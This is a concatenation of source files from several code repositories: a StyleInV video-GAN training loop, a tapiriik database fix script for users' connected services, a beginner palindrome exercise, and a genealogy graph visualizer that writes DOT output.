grid_videos.permute(0, 2, 1, 3, 4) # (b, c, t, h, w)\n # grid_videos: \n return grid_videos, 
grid_images\n\ndef training_loop(\n run_dir = '.', # Output directory.\n visualize_args = {}, # Visualize args: viz_len, fps\n training_set_kwargs = {}, # Options for training set.\n data_loader_kwargs = {}, # Options for torch.utils.data.DataLoader.\n checkpoint = '', # PKL of pretrained pSp and StyleGAN2\n SI_kwargs = {}, # Options for generator network.\n D_kwargs = {}, # Options for discriminator network.\n SI_opt_kwargs = {}, # Options for generator optimizer.\n D_opt_kwargs = {}, # Options for discriminator optimizer.\n augment_kwargs = None, # Options for augmentation pipeline. None = disable.\n loss_kwargs = {}, # Options for loss function.\n metrics = [], # Metrics to evaluate during training.\n random_seed = 0, # Global random seed.\n num_gpus = 1, # Number of GPUs participating in the training.\n rank = 0, # Rank of the current process in [0, num_gpus[.\n batch_size = 4, # Total batch size for one training iteration. Can be larger than batch_gpu * num_gpus.\n batch_gpu = 4, # Number of samples processed at a time by one GPU.\n ema_kimg = 10, # Half-life of the exponential moving average (EMA) of generator weights.\n ema_rampup = None, # EMA ramp-up coefficient.\n G_reg_interval = 4, # How often to perform regularization for G? None = disable lazy regularization.\n D_reg_interval = 16, # How often to perform regularization for D? None = disable lazy regularization.\n augment_p = 0, # Initial value of augmentation probability.\n ada_target = None, # ADA target value. None = fixed p.\n ada_interval = 4, # How often to perform ADA adjustment?\n ada_kimg = 500, # ADA adjustment speed, measured in how many kimg it takes for p to increase/decrease by one unit.\n total_kimg = 25000, # Total length of the training, measured in thousands of real images.\n kimg_per_tick = 4, # Progress snapshot interval.\n image_snapshot_ticks = 50, # How often to save image snapshots? None = disable.\n network_snapshot_ticks = 50, # How often to save network snapshots? None = disable.\n resume_pkl = None, # Network pickle to resume training from.\n resume_whole_state = False, # Should we resume the whole state or only the G/D/G_ema checkpoints?\n cudnn_benchmark = True, # Enable torch.backends.cudnn.benchmark?\n allow_tf32 = False, # Enable torch.backends.cuda.matmul.allow_tf32 and torch.backends.cudnn.allow_tf32?\n abort_fn = None, # Callback function for determining whether to abort training. Must return consistent results across ranks.\n progress_fn = None, # Callback function for updating training progress. 
Called for all ranks.\n):\n # Initialize.\n start_time = time.time()\n device = torch.device('cuda', rank)\n this_random_seed = random_seed * num_gpus + rank\n random.seed(this_random_seed)\n np.random.seed(this_random_seed)\n torch.manual_seed(this_random_seed)\n torch.backends.cudnn.benchmark = cudnn_benchmark # Improves training speed.\n torch.backends.cuda.matmul.allow_tf32 = allow_tf32 # Allow PyTorch to internally use tf32 for matmul\n torch.backends.cudnn.allow_tf32 = allow_tf32 # Allow PyTorch to internally use tf32 for convolutions\n conv2d_gradfix.enabled = True # Improves training speed.\n grid_sample_gradfix.enabled = True # Avoids errors with the augmentation pipe.\n\n # Load training set.\n if rank == 0:\n print('Loading training set...')\n training_set = dnnlib.util.construct_class_by_name(**training_set_kwargs) # subclass of training.dataset.Dataset\n training_set_sampler = misc.InfiniteSampler(dataset=training_set, rank=rank, num_replicas=num_gpus, seed=random_seed)\n training_set_iterator = iter(torch.utils.data.DataLoader(dataset=training_set, sampler=training_set_sampler, batch_size=batch_size//num_gpus, **data_loader_kwargs))\n if rank == 0:\n print()\n print('Num videos: ', training_set.n_videos)\n print('Num frames: ', training_set.total_frames)\n print('Image shape:', training_set.img_resolution)\n print('Sampling: ', training_set.sampling_cfg.type)\n print()\n\n # Construct networks.\n if rank == 0:\n print('Constructing networks...')\n with open(checkpoint, 'rb') as f:\n G = pickle.load(f)['G'].eval().requires_grad_(False).to(device)\n loss_kwargs.num_ws = G.synthesis.num_ws\n SI = dnnlib.util.construct_class_by_name(**SI_kwargs).train().requires_grad_(False).to(device)\n SI.set_latent_avg(G.mapping.w_avg.detach())\n D = dnnlib.util.construct_class_by_name(**D_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module\n SI_ema = copy.deepcopy(SI).eval()\n\n # Resume from existing pickle.\n if resume_pkl is not None:\n print(f'Resuming from \"{resume_pkl}\"')\n with open(resume_pkl, 'rb') as f:\n resume_data = pickle.load(f)\n for name, module in [('G', G), ('D', D), ('SI', SI), ('SI_ema', SI_ema)]:\n misc.copy_params_and_buffers(resume_data[name], module, require_all=False)\n\n # Print network summary tables.\n content_dim = SI_kwargs.mapping_opts.content_dim\n motion_type = SI_kwargs.mapping_opts.motion.type\n require_motion_always = False\n if motion_type == 'motion_and_pe':\n motion_dim = SI_kwargs.mapping_opts.motion.motion_dim\n require_motion_always = True\n elif motion_type == 'acyclic_pe':\n max_num_frames = SI_kwargs.mapping_opts.sampling.max_num_frames\n motion_z_distance = SI_kwargs.mapping_opts.motion.motion_z_distance\n motion_dim = [max_num_frames // motion_z_distance + 1, SI_kwargs.mapping_opts.motion.z_dim]\n require_motion_always = False\n\n noise_mode = loss_kwargs.noise_mode\n if rank == 0:\n # prepare inputs\n zc = torch.randn([batch_gpu, content_dim], device=device)\n zm = torch.randn([batch_gpu, motion_dim], device=device) if require_motion_always else None\n g_frames = SI_kwargs.mapping_opts.sampling.num_frames_per_video\n d_frames = loss_kwargs.real_sampling_cfg.num_frames_per_video\n Ts = torch.linspace(0, 1, steps=g_frames).view(g_frames, 1).unsqueeze(0).to(device)\n Ts = Ts.repeat([batch_gpu, 1, 1])\n \n # Generate initial frame\n wc = misc.print_module_summary(G.mapping, [zc, None])\n num_ws = wc.shape[1]\n img0 = misc.print_module_summary(G.synthesis, [wc])\n wc = wc[:, 0, :]\n \n # StyleInV output latents\n styles 
= misc.print_module_summary(SI, [img0, wc, zm, Ts, False, True, loss_kwargs.mutual_recon])\n if loss_kwargs.mutual_recon:\n styles = styles[0]\n styles_broadcast = styles.unsqueeze(1).repeat([1, num_ws, 1])\n \n # Map latents to images\n imgs = misc.print_module_summary(G.synthesis, [styles_broadcast])\n img_list = list(imgs.split(batch_gpu, dim=0))\n\n # process adversarial input\n if g_frames < d_frames:\n img_list = [img0] + img_list\n Ts = torch.cat([torch.zeros(batch_gpu, 1, 1).float().to(device), Ts], dim=1)\n elif g_frames > d_frames:\n img_list = img_list[1:]\n Ts = Ts[:, 1:]\n\n # Quintuplet sparse training discriminator\n if loss_kwargs.D_type == 'digan':\n img_D = torch.cat(img_list, dim=1)\n H, W = img_D.shape[2:]\n Ts = Ts.unsqueeze(-1)\n dTs = (Ts[:, 1:] - Ts[:, :-1]).repeat(1, 1, H, W)\n img_D = torch.cat([img_D, dTs], dim=1)\n misc.print_module_summary(D, [img_D, None])\n elif loss_kwargs.D_type in ['stylegan-v', 'ffc']:\n Ts = Ts.squeeze(-1)\n if loss_kwargs.D_type == 'ffc':\n Ts = Ts[:, 1:]\n img_D = torch.cat(img_list, dim=1)\n img_D = rearrange(img_D, 'b (t c) h w -> (b t) c h w', c=3)\n misc.print_module_summary(D, [img_D, Ts])\n\n # Setup augmentation.\n if rank == 0:\n print('Setting up augmentation...')\n\n if (augment_kwargs is not None) and (augment_p > 0 or ada_target is not None):\n augment_pipe = dnnlib.util.construct_class_by_name(**augment_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module\n augment_pipe.p.copy_(torch.as_tensor(augment_p))\n\n if ada_target is not None:\n ada_stats = training_stats.Collector(regex='Loss/signs/real')\n else:\n ada_stats = None\n\n if resume_whole_state:\n misc.copy_params_and_buffers(resume_data['augment_pipe'], augment_pipe, require_all=False)\n else:\n augment_pipe = None\n ada_stats = None\n\n # Distribute across GPUs.\n if rank == 0:\n print(f'Distributing across {num_gpus} GPUs...')\n ddp_modules = dict()\n for name, module in [('G_mapping', G.mapping), ('G_synthesis', G.synthesis), ('SI', SI), (None, SI_ema), ('D', D), ('augment_pipe', augment_pipe)]:\n if (num_gpus > 1) and (module is not None) and len(list(module.parameters())) != 0:\n module.requires_grad_(True)\n module = torch.nn.parallel.DistributedDataParallel(module, device_ids=[device], broadcast_buffers=False)\n module.requires_grad_(False)\n if name is not None:\n ddp_modules[name] = module\n\n # Setup training phases.\n if rank == 0:\n print('Setting up training phases...')\n loss = dnnlib.util.construct_class_by_name(device=device, **ddp_modules, **loss_kwargs) # subclass of training.loss.Loss\n if rank == 0:\n print(f\"StyleInV loss: input_skip_to_D = {loss.input_skip_to_D}\")\n \n phases = []\n for name, module, opt_kwargs, reg_interval in [('SI', SI, SI_opt_kwargs, 0), ('D', D, D_opt_kwargs, D_reg_interval)]:\n if reg_interval is None:\n opt = dnnlib.util.construct_class_by_name(params=module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'both', module=module, opt=opt, interval=1)]\n else: # Lazy regularization.\n if reg_interval == 0:\n opt = dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)]\n else: \n mb_ratio = reg_interval / (reg_interval + 1)\n opt_kwargs = dnnlib.EasyDict(opt_kwargs)\n opt_kwargs.lr = opt_kwargs.lr * mb_ratio\n opt_kwargs.betas = [beta ** mb_ratio for beta in opt_kwargs.betas]\n opt = 
dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer\n phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)]\n phases += [dnnlib.EasyDict(name=name+'reg', module=module, opt=opt, interval=reg_interval)]\n \n for phase in phases:\n phase.start_event = None\n phase.end_event = None\n if rank == 0:\n phase.start_event = torch.cuda.Event(enable_timing=True)\n phase.end_event = torch.cuda.Event(enable_timing=True)\n\n # Export sample images.\n grid_size = None\n grid_z = None\n grid_c = None\n if rank == 0:\n print('Exporting sample images and videos ...')\n grid_size, images = setup_snapshot_image_grid(training_set=training_set, random_seed=this_random_seed)\n save_image_grid(images, os.path.join(run_dir, 'reals.png'), drange=[0,255], grid_size=grid_size)\n real_videos = setup_snapshot_video_grid(training_set_kwargs=training_set_kwargs, grid_size=grid_size, random_seed=this_random_seed)\n torchvision.io.write_video(os.path.join(run_dir, 'reals.mp4'), real_videos, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n grid_batch = grid_size[0] * grid_size[1]\n grid_zc = torch.randn([grid_batch, content_dim], device=device)\n grid_zm = torch.randn([grid_batch, motion_dim], device=device) if require_motion_always else None\n grid_max_t_stamp = (visualize_args.viz_len - 1) * (1.0 / (training_set.nframes - 1))\n grid_Ts = torch.linspace(0, grid_max_t_stamp, steps=visualize_args.viz_len).view(visualize_args.viz_len, 1).unsqueeze(0).to(device)\n grid_wc = G.mapping(grid_zc, None)\n grid_num_ws = grid_wc.shape[1]\n grid_x = G.synthesis(grid_wc)\n grid_wc = grid_wc[:, 0, :]\n grid_args = dnnlib.EasyDict(grid_batch=grid_batch, grid_x=grid_x, grid_wc=grid_wc, grid_zm=grid_zm, grid_Ts=grid_Ts, grid_num_ws=grid_num_ws, noise_mode=noise_mode)\n\n grid_videos, grid_images = generate_visualize_videos(SI_ema, G.synthesis, **grid_args)\n grid_videos = ((grid_videos*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_video_to_save = convert_batch_videos_to_grid(grid_videos, grid_size)\n\n if motion_type == 'acyclic_pe':\n grid_zm_same_motion = SI_ema.mapping.generate_motion_sequence(grid_Ts[0])\n grid_zm_same_motion = grid_zm_same_motion.repeat_interleave(grid_batch, dim=0)\n grid_args_same_motion = copy.deepcopy(grid_args)\n grid_args_same_motion.grid_zm = grid_zm_same_motion\n\n grid_videos_same_motion, _ = generate_visualize_videos(SI_ema, G.synthesis, **grid_args_same_motion)\n grid_videos_same_motion = ((grid_videos_same_motion*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_videos_same_motion = convert_batch_videos_to_grid(grid_videos_same_motion, grid_size)\n\n pad_size = 64\n grid_pad = (torch.ones_like(grid_video_to_save[:, :, :pad_size, :]) * 255).to(torch.uint8)\n grid_video_to_save = torch.cat([\n grid_video_to_save,\n grid_pad, # Some padding between the videos\n grid_videos_same_motion,\n ], dim=2) # [video_len, h, w + pad_size + w, 3]\n\n save_image_grid(grid_images, os.path.join(run_dir, 'fakes_init.png'), drange=[-1,1], grid_size=(grid_size[0]*2, grid_size[1]))\n torchvision.io.write_video(os.path.join(run_dir, 'fake_init.mp4'), grid_video_to_save, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n # Initialize logs.\n if rank == 0:\n print('Initializing logs...')\n stats_collector = training_stats.Collector(regex='.*')\n stats_metrics = dict()\n stats_jsonl = None\n stats_tfevents = None\n if rank == 0:\n stats_jsonl = open(os.path.join(run_dir, 'stats.jsonl'), 'wt')\n try:\n 
import torch.utils.tensorboard as tensorboard\n stats_tfevents = tensorboard.SummaryWriter(run_dir)\n except ImportError as err:\n print('Skipping tfevents export:', err)\n\n # Train.\n if rank == 0:\n print(f'Training for {total_kimg} kimg...')\n print()\n cur_nimg = 0\n cur_tick = 0\n tick_start_nimg = cur_nimg\n tick_start_time = time.time()\n maintenance_time = tick_start_time - start_time\n batch_idx = 0\n if progress_fn is not None:\n progress_fn(0, total_kimg)\n while True:\n\n # Fetch training data.\n with torch.autograd.profiler.record_function('data_fetch'):\n # real_image\n batch_real_imgs, batch_real_ts = next(training_set_iterator)\n phase_real_imgs = batch_real_imgs.to(torch.float32).to(device) / 127.5 - 1 # [b (t c) h w]\n phase_real_imgs = phase_real_imgs.split(batch_gpu)\n phase_real_ts = batch_real_ts.unsqueeze(-1).to(device).to(torch.float32)\n phase_real_ts = phase_real_ts.split(batch_gpu)\n\n #real_t = real_t_delta.view(*real_t_delta.shape, 1, 1).repeat(1, 1, *phase_real_imgs.shape[-2:]).to(device).to(torch.float32)\n #phase_real_imgs = torch.cat([phase_real_imgs, real_t], dim=1).split(batch_gpu)\n\n # gen_z\n batch_tmp = batch_size // num_gpus\n all_gen_zc = torch.randn([len(phases) * batch_tmp, content_dim], device=device)\n all_gen_zc = [phase_gen_zc.split(batch_gpu) for phase_gen_zc in all_gen_zc.split(batch_tmp)]\n if require_motion_always:\n all_gen_zm = torch.randn([len(phases) * batch_tmp, motion_dim], device=device)\n all_gen_zm = [phase_gen_zm.split(batch_gpu) for phase_gen_zm in all_gen_zm.split(batch_tmp)]\n else:\n all_gen_zm = [[None] * (batch_size // batch_gpu) for _ in range(len(phases))]\n\n # Execute training phases.\n for phase, phase_gen_zc, phase_gen_zm in zip(phases, all_gen_zc, all_gen_zm):\n if batch_idx % phase.interval != 0:\n continue\n\n # Initialize gradient accumulation.\n if phase.start_event is not None:\n phase.start_event.record(torch.cuda.current_stream(device))\n phase.opt.zero_grad(set_to_none=True)\n phase.module.requires_grad_(True)\n\n # Accumulate gradients over multiple rounds.\n for round_idx, (real_img, real_ts, gen_zc, gen_zm) in enumerate(zip(phase_real_imgs, phase_real_ts, phase_gen_zc, phase_gen_zm)):\n sync = (round_idx == batch_size // (batch_gpu * num_gpus) - 1)\n gain = phase.interval\n loss.accumulate_gradients(phase=phase.name, real_imgs=real_img, real_ts=real_ts, gen_zc=gen_zc, gen_zm=gen_zm, sync=sync, gain=gain)\n\n # Update weights.\n phase.module.requires_grad_(False)\n with torch.autograd.profiler.record_function(phase.name + '_opt'):\n for param in phase.module.parameters():\n if param.grad is not None:\n misc.nan_to_num(param.grad, nan=0, posinf=1e5, neginf=-1e5, out=param.grad)\n phase.opt.step()\n if phase.end_event is not None:\n phase.end_event.record(torch.cuda.current_stream(device))\n \n # Update SI_ema\n ema_nimg = ema_kimg * 1000\n if ema_rampup is not None:\n ema_nimg = min(ema_nimg, cur_nimg * ema_rampup)\n ema_beta = 0.5 ** (batch_size / max(ema_nimg, 1e-8))\n for p_ema, p in zip(SI_ema.parameters(), SI.parameters()):\n p_ema.copy_(p.lerp(p_ema, ema_beta))\n for b_ema, b in zip(SI_ema.buffers(), SI.buffers()):\n b_ema.copy_(b)\n\n # Update state.\n cur_nimg += batch_size * loss.n_sparse\n batch_idx += 1\n\n # Execute ADA heuristic\n if (ada_stats is not None) and (batch_idx % ada_interval == 0):\n ada_stats.update()\n adjust = np.sign(ada_stats['Loss/signs/real'] - ada_target) * (batch_size * ada_interval) / (ada_kimg * 1000)\n augment_pipe.p.copy_((augment_pipe.p + adjust).max(misc.constant(0, 
device=device)))\n\n # Perform maintenance tasks once per tick.\n done = (cur_nimg >= total_kimg * 1000)\n if (not done) and (cur_tick != 0) and (cur_nimg < tick_start_nimg + kimg_per_tick * 1000):\n continue\n\n # Print status line, accumulating the same information in stats_collector.\n tick_end_time = time.time()\n fields = []\n fields += [f\"tick {training_stats.report0('Progress/tick', cur_tick):<5d}\"]\n fields += [f\"kimg {training_stats.report0('Progress/kimg', cur_nimg / 1e3):<8.1f}\"]\n fields += [f\"time {dnnlib.util.format_time(training_stats.report0('Timing/total_sec', tick_end_time - start_time)):<12s}\"]\n fields += [f\"sec/tick {training_stats.report0('Timing/sec_per_tick', tick_end_time - tick_start_time):<7.1f}\"]\n fields += [f\"sec/kimg {training_stats.report0('Timing/sec_per_kimg', (tick_end_time - tick_start_time) / (cur_nimg - tick_start_nimg) * 1e3):<7.2f}\"]\n fields += [f\"maintenance {training_stats.report0('Timing/maintenance_sec', maintenance_time):<6.1f}\"]\n fields += [f\"cpumem {training_stats.report0('Resources/cpu_mem_gb', psutil.Process(os.getpid()).memory_info().rss / 2**30):<6.2f}\"]\n fields += [f\"gpumem {training_stats.report0('Resources/peak_gpu_mem_gb', torch.cuda.max_memory_allocated(device) / 2**30):<6.2f}\"]\n fields += [f\"augment {training_stats.report0('Progress/augment', float(augment_pipe.p.cpu()) if augment_pipe is not None else 0):.3f}\"]\n torch.cuda.reset_peak_memory_stats()\n training_stats.report0('Timing/total_hours', (tick_end_time - start_time) / (60 * 60))\n training_stats.report0('Timing/total_days', (tick_end_time - start_time) / (24 * 60 * 60))\n if rank == 0:\n print(' '.join(fields))\n\n # Check for abort.\n if (not done) and (abort_fn is not None) and abort_fn():\n done = True\n if rank == 0:\n print()\n print('Aborting...')\n\n # Save image and video snapshot.\n if (rank == 0) and (image_snapshot_ticks is not None) and (done or cur_tick % image_snapshot_ticks == 0):\n grid_videos, grid_images = generate_visualize_videos(SI_ema, G.synthesis, **grid_args)\n save_image_grid(grid_images, os.path.join(run_dir, f'fakes{cur_nimg//1000:06d}.png'), drange=[-1,1], grid_size=(grid_size[0]*2, grid_size[1]))\n grid_videos = ((grid_videos*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_video_to_save = convert_batch_videos_to_grid(grid_videos, grid_size)\n\n if motion_type == 'acyclic_pe':\n grid_zm_same_motion = SI_ema.mapping.generate_motion_sequence(grid_Ts[0])\n grid_zm_same_motion = grid_zm_same_motion.repeat_interleave(grid_batch, dim=0)\n grid_args_same_motion = copy.deepcopy(grid_args)\n grid_args_same_motion.grid_zm = grid_zm_same_motion\n grid_videos_same_motion, _ = generate_visualize_videos(SI_ema, G.synthesis, **grid_args_same_motion)\n grid_videos_same_motion = ((grid_videos_same_motion*0.5+0.5)*255).clamp(0,255).to(torch.uint8)\n grid_videos_same_motion = convert_batch_videos_to_grid(grid_videos_same_motion, grid_size)\n\n pad_size = 64\n grid_pad = (torch.ones_like(grid_video_to_save[:, :, :pad_size, :]) * 255).to(torch.uint8)\n grid_video_to_save = torch.cat([\n grid_video_to_save,\n grid_pad, # Some padding between the videos\n grid_videos_same_motion,\n ], dim=2) # [video_len, 3, h, w + pad_size + w]\n\n torchvision.io.write_video(os.path.join(run_dir, f'fake{cur_nimg//1000:06d}.mp4'), grid_video_to_save, fps=visualize_args.fps, video_codec='h264', options={'crf': '10'})\n\n # Save network snapshot.\n snapshot_pkl = None\n snapshot_data = None\n snapshot_modules = [\n ('G', G),\n ('D', D),\n ('SI', SI),\n ('SI_ema', 
SI_ema),\n            ('augment_pipe', augment_pipe)\n        ]\n        if (network_snapshot_ticks is not None) and (done or cur_tick % network_snapshot_ticks == 0):\n            snapshot_data = dict(training_set_kwargs=dict(training_set_kwargs))\n            DDP_CONSISTENCY_IGNORE_REGEX = r'.*\\.(w_avg|latent_avg|embeds.*\\.weight|num_batches_tracked|running_mean|running_var)'\n            for name, module in snapshot_modules:\n                if module is not None:\n                    if num_gpus > 1:\n                        misc.check_ddp_consistency(module, ignore_regex=DDP_CONSISTENCY_IGNORE_REGEX)\n                    module = copy.deepcopy(module).eval().requires_grad_(False).cpu()\n                snapshot_data[name] = module\n                del module # conserve memory\n            snapshot_pkl = os.path.join(run_dir, f'network-snapshot-{cur_nimg//1000:06d}.pkl')\n            if rank == 0:\n                with open(snapshot_pkl, 'wb') as f:\n                    pickle.dump(snapshot_data, f)\n\n        # Evaluate metrics.\n        if (snapshot_data is not None) and (len(metrics) > 0):\n            if rank == 0:\n                print('Evaluating metrics...')\n            for metric in metrics:\n                result_dict = metric_main.calc_metric(metric=metric, SI=snapshot_data['SI_ema'], SI_kwargs=SI_kwargs, G=snapshot_data['G'], \n                    G_kwargs={'noise_mode': noise_mode}, dataset_kwargs=training_set_kwargs, num_gpus=num_gpus, rank=rank, device=device)\n                if rank == 0:\n                    metric_main.report_metric(result_dict, run_dir=run_dir, snapshot_pkl=snapshot_pkl)\n                stats_metrics.update(result_dict.results)\n            del snapshot_data # conserve memory\n\n        # Collect statistics.\n        for phase in phases:\n            value = []\n            if (phase.start_event is not None) and (phase.end_event is not None):\n                phase.end_event.synchronize()\n                value = phase.start_event.elapsed_time(phase.end_event)\n            training_stats.report0('Timing/' + phase.name, value)\n        stats_collector.update()\n        stats_dict = stats_collector.as_dict()\n\n        # Update logs.\n        timestamp = time.time()\n        if stats_jsonl is not None:\n            fields = dict(stats_dict, timestamp=timestamp)\n            stats_jsonl.write(json.dumps(fields) + '\\n')\n            stats_jsonl.flush()\n        if stats_tfevents is not None:\n            global_step = int(cur_nimg / 1e3)\n            walltime = timestamp - start_time\n            for name, value in stats_dict.items():\n                stats_tfevents.add_scalar(name, value.mean, global_step=global_step, walltime=walltime)\n            for name, value in stats_metrics.items():\n                stats_tfevents.add_scalar(f'Metrics/{name}', value, global_step=global_step, walltime=walltime)\n            stats_tfevents.flush()\n        if progress_fn is not None:\n            progress_fn(cur_nimg // 1000, total_kimg)\n\n        # Update state.\n        cur_tick += 1\n        tick_start_nimg = cur_nimg\n        tick_start_time = time.time()\n        maintenance_time = tick_start_time - tick_end_time\n        if done:\n            break\n\n    # Done.\n    if rank == 0:\n        print()\n        print('Exiting...')\n\n#----------------------------------------------------------------------------\n","repo_name":"johannwyh/StyleInV","sub_path":"training/training_loop_styleinv.py","file_name":"training_loop_styleinv.py","file_ext":"py","file_size_in_byte":30579,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"74165382187","text":"from tapiriik.database import db\nfrom tapiriik.settings import _GLOBAL_LOGGER, COLOG\n\n# We go through all users in the database.\nusers = db.users.find()\nfor user in users:\n\n    # We retrieve the user's connected services.\n    usr_connected_services = user['ConnectedServices']\n\n    # Then we retrieve the names of those connected services.\n    usr_connected_services_names = [service['Service'] for service in usr_connected_services]\n\n    # We now get the connections attached to the user via their IDs.\n    usr_connections = [user_connection 
for user_connection in db.connections.find({\n        \"_id\": {\n            \"$in\": [usr_connected_service[\"ID\"] for usr_connected_service in usr_connected_services]\n        }\n    })]\n\n    # Then we get their names.\n    usr_connections_names = [service['Service'] for service in usr_connections]\n\n    # To determine the \"lost services\" we take an XOR to exclude the connections that are present\n    # both in the user's connected services and in the connections collection.\n    usr_lost_svc = [service_name for service_name in list(set(usr_connected_services_names) ^ set(usr_connections_names))]\n\n    # We check that there is at least one lost service, to avoid needlessly reprocessing and rewriting users.\n    if len(usr_lost_svc) != 0:\n        _GLOBAL_LOGGER.info(\"Impacted USER : \"+COLOG.blue(user))\n        _GLOBAL_LOGGER.info(\"User connected services : \\t\"+COLOG.cyan(usr_connected_services_names))\n        _GLOBAL_LOGGER.info(\"User connections names : \\t\"+COLOG.magenta(usr_connections_names))\n        _GLOBAL_LOGGER.info(\"User lost services : \\t\\t\"+COLOG.red(usr_lost_svc))\n        _GLOBAL_LOGGER.info(COLOG.yellow(\"-----------------Creating new connected service object-----------------\"))\n        # We rebuild the user's connected-services list with the services that are really connected.\n        new_usr_connected_services = [\n            {\n                \"Service\": usr_connection['Service'], \n                \"ID\":usr_connection[\"_id\"]\n            } for usr_connection in usr_connections\n        ]\n\n        _GLOBAL_LOGGER.info(usr_connections_names)\n\n        _GLOBAL_LOGGER.info(\"Actual user connected service in db : \\t\"+COLOG.cyan(usr_connected_services))\n        _GLOBAL_LOGGER.info(\"The new one shall look like this : \\t\"+COLOG.magenta(new_usr_connected_services))\n        _GLOBAL_LOGGER.info(COLOG.yellow(\"-----------------Replacing user connected service by the real ones-----------------\"))\n        # As the logs mention, we replace the connected-services array with the newly processed one.\n        user['ConnectedServices'] = new_usr_connected_services\n        _GLOBAL_LOGGER.info(\"User with new connected services : \"+COLOG.blue(user))\n        # We overwrite the stored user document with the corrected services.\n        db.users.update_one({\"_id\": user[\"_id\"]},{\"$set\":user})\n","repo_name":"kevforget/hub-decathlon-debug","sub_path":"fix_connections.py","file_name":"fix_connections.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18440219982","text":"def FindPolindrom(num):\n\n    if 1 <= num // 10**4 <= 9:\n        digits = []\n        while num != 0:\n            digits.append(num % 10)\n            num //= 10\n        if digits[0] == digits[4] and digits[1] == digits[3]:\n            return print(\"Yes! 
It's a palindrome\")\n        else:\n            return print(\"No, it's not a palindrome\")\n\nFindPolindrom(int(input(\"Enter a five-digit number: \")))","repo_name":"DmitriyPyanzin/HomeWork","sub_path":"01._Introduction_to_programming_languages/Lesson_3._Arrays_and_Functions_in_Programming/main_tasks/Task19/Python/Task19.py","file_name":"Task19.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41814775826","text":"class Visualizer:\n\t\"\"\"\n\tClass for generating DOT-files to answer the search queries.\n\t\"\"\"\n\tdef __init__(self, connector, details):\n\t\tself.connection = connector[0]\n\t\tself.cursor = connector[1]\n\n\t\tself.noDetails = details\n\n\n\tdef createNodeStr(self, color, id):\n\t\t# Get name\n\t\tself.cursor.execute(\"SELECT name FROM person WHERE pID=?\", (id,))\n\t\trow = self.cursor.fetchone()\n\t\tname = row[\"name\"]\n\t\tname = name.replace(\"\\\"\",\"\\'\")\n\n\t\t# Get dissertation, university and year\n\t\t# Only information of one dissertation will be printed\n\t\tself.cursor.execute(\"SELECT university, year FROM dissertation WHERE author=?\", (id,))\n\t\trow = self.cursor.fetchone()\n\t\tuni = row[\"university\"]\n\t\tyear = row[\"year\"]\n\n\t\t# Merge everything to a string and add to DOT-file\n\t\tif self.noDetails:\n\t\t\tnodeStr = u\" {} [label=\\\"{} ({})\\\", fontcolor={}, URL=\\\"http://www.google.com/#q={}\\\"];\"\\\n\t\t\t.format(id, name, year, color, name).encode('utf-8')\n\n\t\telse:\n\t\t\tnodeStr = u\" {} [label=\\\"{} \\\\n{} {}\\\", fontcolor={}, URL=\\\"http://www.google.com/#q={}\\\"];\"\\\n\t\t\t.format(id, name, uni, year, color, name).encode('utf-8')\n\n\t\treturn nodeStr\n\n\n\tdef createEdgeStr(self, color, id, blackSet, redSet):\n\t\t# Get relationship and store it to add it at the end of the\n\t\t# DOT-file when exiting this loop.\n\t\tself.cursor.execute(\"SELECT author FROM advised, dissertation WHERE student=dID AND advisor=?\", (id,))\n\t\tstudents = self.cursor.fetchall()\n\n\t\tedges = \"\"\n\n\t\tfor student in students:\n\t\t\tif redSet is not None and student[\"author\"] in redSet:\n\t\t\t\tedgeStr = u\"\\n {} -> {} [color={}];\".format(id, student[\"author\"], color).encode('utf-8')\n\t\t\t\tedges += edgeStr\n\n\t\t\telif blackSet is not None and student[\"author\"] in blackSet:\n\t\t\t\tedgeStr = u\"\\n {} -> {} [color=black];\".format(id, student[\"author\"]).encode('utf-8')\n\t\t\t\tedges += edgeStr\n\n\t\treturn edges\n\n\n\tdef generateDotFile(self, blackSet, redSet=None):\n\t\tedges = \"\"\n\t\tdotFile = \"\"\n\t\tdotFile += \"\"\"digraph genealogy {\n\tgraph [charset=\"utf-8\"];\n\tnode [shape=plaintext];\n\tedge [style=bold];\\n\\n\"\"\"\n\n\t\tif blackSet is not None:\n\t\t\tfor id in blackSet:\n\t\t\t\tdotFile += self.createNodeStr(\"black\", id)\n\t\t\t\tedge = self.createEdgeStr(\"black\", id, blackSet, redSet)\n\n\t\t\t\tif edge != \"\":\n\t\t\t\t\tedges += edge\n\n\t\t\t\tdotFile += \"\\n\"\n\n\t\tif redSet is not None:\n\t\t\tfor id in redSet:\n\t\t\t\tdotFile += self.createNodeStr(\"red\", id)\n\t\t\t\tedge = self.createEdgeStr(\"red\", id, blackSet, redSet)\n\n\t\t\t\tif edge != \"\":\n\t\t\t\t\tedges += edge\n\n\t\t\t\tdotFile += \"\\n\"\n\n\t\t# Now print the connections between the nodes.\n\t\tdotFile += edges\n\t\tdotFile += \"\\n}\\n\"\n\n\t\treturn 
